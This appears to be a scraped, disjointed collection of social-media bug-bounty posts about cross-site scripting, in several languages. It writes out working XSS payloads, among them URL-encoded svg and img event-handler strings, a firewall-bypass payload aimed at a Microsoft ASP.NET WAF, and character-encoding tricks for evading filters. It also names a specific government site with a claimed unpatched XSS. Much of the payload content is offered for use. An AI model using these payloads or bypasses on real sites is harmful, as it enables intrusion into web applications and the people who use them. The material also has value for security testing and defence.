ONE OF MY BEST XSS ONELINER SUCCESSER MUST TRY :)
#bugbountytips

MY SIMPLE PERSONAL HTML/XSS/IFRAME PAYLOADS THAT I USE MOST..
#bugbounty tips #bugbounty

self XSS deyip geçmeyeceksin

XSS Oneliner by Coffin

#BugBounty #bugbountytips

cheer extreme XSS
#WORLDS saturday

#XSS could be be triggers in #url itself, no need to parameter injection✌🏻

Payloads:
1-
%3Csvg%20onload=alert(%22MrHex88%22)%3E

2-
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

#bugbounty #bugbounty tip #bugbounty tips
#MrHex88

TIL: HTML comments work as single-line-comments in JavaScript context 🤯

<script>
<!-- test --> alert(1);
alert(2);
</script>

Only alert(2) is executed.

#HTML #LegacyStuff #XSS

هر موقع یه self XSS پیدا کردید ازش رد نشین.
خیلی وقتا با کمی خلاقیت میتونه تبدیل بشه به یه آسیب پذیری حیاتی🙂🤨

Place to find Blind Xss !

WHERE TO HUNT BLIND XSS/POSSIBLE FIELDS :)
#BugBounty #bugbountytips

When to hunt for Blind XSS

Credit:Coffin

#BugBounty #bugbountytips

xss dance!!!

XSS Bypass - working on ASPNET Generic Microsoft WAF (detected by AFW00F)

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//

Tag the original creator below so I can give them some hacker clout.

#bugbounty #bugbounty tip

레오츠카

Here are XSS Payloads To Bypass Firewall

Credit/source-
Maniesh.Neupane

Basic XSS Encoding Tips ⏬

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e

#bugbounty #bugbounty tips #hackthebox

Este XSS fue reportado desde el 24 de junio de 2015 a las 07:07 horas y hasta la fecha no se ha hecho nada. ISSSTE

https[:]//oficinavirtual.issste.gob.mx/Resultados?Search='>XSS

Yo no lo hice, solo estoy avisando.